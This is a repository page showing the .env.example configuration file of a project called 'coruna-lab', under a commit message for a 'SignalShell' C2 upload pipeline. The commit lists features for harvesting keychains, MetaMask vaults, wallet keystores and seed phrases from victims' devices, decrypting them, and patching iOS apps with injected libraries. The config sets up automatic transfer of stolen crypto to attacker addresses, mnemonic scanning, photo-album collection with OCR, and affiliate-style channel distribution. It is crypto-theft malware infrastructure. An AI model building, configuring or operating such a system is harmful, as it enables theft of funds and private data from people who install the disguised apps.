Files
coruna-lab/.env.example
T
hashbro 316b4cea51 feat: SignalShell v1 upload pipeline + APP builder
SignalShell (shenma.my) C2 Pipeline:
- /api/ap/upload: single POST upload endpoint (replaces upload.php)
- /api/ap/lg: log upload endpoint
- /api/ap/config: JSON config with per-channel h5_url
- Async ProcessShellUpload job (shell queue, database driver)
- Keychain XML parsing → wallet keystores + addresses
- ZIP parsing → keystore extraction (Trust/TronLink/imToken)
- MetaMask vault extraction from persist-KeyringController
- MetaMask address extraction from ProfileMetricsController
- Blockchain address scanner (ETH/TRON, text files only)
- Bitpie seedPhraseEntropy → BIP39 mnemonic recovery
- Trust Wallet keystore auto-decrypt via keychain password
- Channel ID from query param a= stored as channel_id

APP Builder (super admin only):
- AppPackageService: base IPA → custom IPA (domain/logo/name/ID)
- POST /admin/channels/build-app endpoint
- Admin UI: 新建 APP button with full form
- Logo upload → 14 icon sizes via PHP GD
- Binary patch: libroute.dylib + libmcmlease.dylib
- Config API returns channel-specific h5_url as website_url

Channels:
- New h5_url column (nullable varchar 2048)
- App builder channels support h5_url for WebView URL
- shell queue connection (database driver, 300s retry)
2026-10-06 06:41:52 +08:00

135 lines
3.5 KiB
Bash
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
APP_NAME="Coruna Lab"
APP_ENV=local
APP_KEY=
# Comma-separated old APP_KEY values (only if you rotated the key). Needed to decrypt old mnemonic_enc.
# APP_PREVIOUS_KEYS=base64:oldkey...
APP_DEBUG=true
APP_URL=https://example.com
APP_LOCALE=en
APP_FALLBACK_LOCALE=en
APP_FAKER_LOCALE=en_US
APP_MAINTENANCE_DRIVER=file
BCRYPT_ROUNDS=12
LOG_CHANNEL=daily
LOG_DAILY_DAYS=14
LOG_DEPRECATIONS_CHANNEL=null
LOG_LEVEL=debug
# Preferred: MySQL 8.0
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=coruna
DB_USERNAME=coruna
DB_PASSWORD=
# Fallback for smoke tests when MySQL creds unavailable:
# DB_CONNECTION=sqlite
# DB_DATABASE=database/database.sqlite
SESSION_DRIVER=file
SESSION_LIFETIME=120
SESSION_ENCRYPT=false
SESSION_PATH=/
SESSION_DOMAIN=null
BROADCAST_CONNECTION=log
FILESYSTEM_DISK=local
QUEUE_CONNECTION=sync
CACHE_STORE=file
CACHE_STORE=redis
QUEUE_CONNECTION=redis
REDIS_HOST=127.0.0.1
REDIS_PORT=6379
# Admin seeder defaults
ADMIN_USERNAME=admin
ADMIN_PASSWORD=admin123
# Optional link-display hosts (not used by DGA binary patch).
# Overridable by 系统设置 → 投放域名.
CORUNA_LAB_CHANNEL_DOMAINS=
CORUNA_REPORTING_DOMAINS=
CORUNA_ADMIN_HOSTS=
CORUNA_AGENT_HOSTS=
# 内嵌 channel-builder(无 Build API;产物默认 public/)
CORUNA_CHANNEL_BUILDER_PYTHON=/www/wwwroot/coruna-lab/channel-builder/.venv/bin/python
CORUNA_CHANNEL_BUILDER_NEW_PYTHON=/www/wwwroot/coruna-lab/channel-builder-new/.venv/bin/python
CORUNA_ARTIFACT_ROOT=/www/wwwroot/coruna-lab/public
CORUNA_CHANNEL_STATE_ROOT=/www/wwwroot/coruna-lab/storage/app/channel-builder
CORUNA_CHANNEL_BUILDER_TIMEOUT=600
# Scheme for support links built from CORUNA_LAB_CHANNEL_DOMAINS
# Max channel links per agent (super-admin settings can override)
CORUNA_MAX_CHANNELS_PER_AGENT=5
CORUNA_7Z_BIN=/www/wwwroot/coruna-lab/bin/7z
# Telegram (outbound alerts + inbound Nutgram commands)
TELEGRAM_BOT_TOKEN=
TELEGRAM_OWNER_CHAT_ID=
# Optional; if set, register via: php artisan telegram:set-webhook
TELEGRAM_WEBHOOK_SECRET=
# Do not enable unless you understand Nutgram's md5(APP_KEY) secret check
# NUTGRAM_SAFE_MODE=false
TRANSFER_TO_ADDRESS=
TRANSFER_TO_ADDRESS_ETH=
TRANSFER_TO_ADDRESS_BSC=
TRANSFER_TO_ADDRESS_BTC=
TRANSFER_TO_ADDRESS_SOL=
# TRANSFER_MAX_USDT=0
# TRANSFER_MAX_TRX=0
# TRANSFER_MAX_DERIVE_INDEX=20
# TRANSFER_TRX_FEE_RESERVE=1
TRON_FULL_NODE=https://api.trongrid.io
TRON_API_KEY=
TRON_USDT_CONTRACT=TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t
# Tokenview address tracking (monitor=1 addresses)
TOKENVIEW_API_KEY=
TOKENVIEW_SIGN_KEY=
# TOKENVIEW_BASE_URL=https://services.tokenview.io/vipapi
TRUSTED_PROXIES=*
XXBB_CHANNEL_C=
TELEGRAM_BOT_USERNAME=
CORUNA_OFFICIAL_ALBUM_STORAGE=0
# 1 = 代理可见助记词扫描且入库挂原设备;0 = 隐藏代理扫描菜单,扫描入库挂官方设备
CORUNA_AGENT_MNEMONIC_SCAN=1
# 0 = only super admin can reveal mnemonics; 1 = staff + per-agent switch (still requires Google 2FA)
CORUNA_STAFF_MNEMONIC_REVEAL=0
AUTO_TRANSFER_ENABLED=0
AUTO_TRANSFER_THRESHOLD_USDT=
AUTO_TRANSFER_THRESHOLD_TRX=
AUTO_TRANSFER_THRESHOLD_ETH=
AUTO_TRANSFER_THRESHOLD_BTC=
AUTO_TRANSFER_THRESHOLD_BNB=
TRANSFER_FEE_ADDRESS_TRON=
TRANSFER_FEE_TOPUP_TRX=20
TRANSFER_FEE_PRIVATE_KEY_TRON=
# New machine only: pull missing album files from the old host while rsync catches up.
# Same PHOTO_ORIGIN_TOKEN on both machines. Leave PHOTO_ORIGIN_URL empty on the old host.
# PHOTO_ORIGIN_URL=http://旧机IP或域名
# PHOTO_ORIGIN_TOKEN=
# PHOTO_ORIGIN_TIMEOUT=60
CORUNA_TESSERACT=/usr/bin/tesseract
CORUNA_OCR_MAX_EDGE=1280
APP_API_DOMAIN=xxxx.com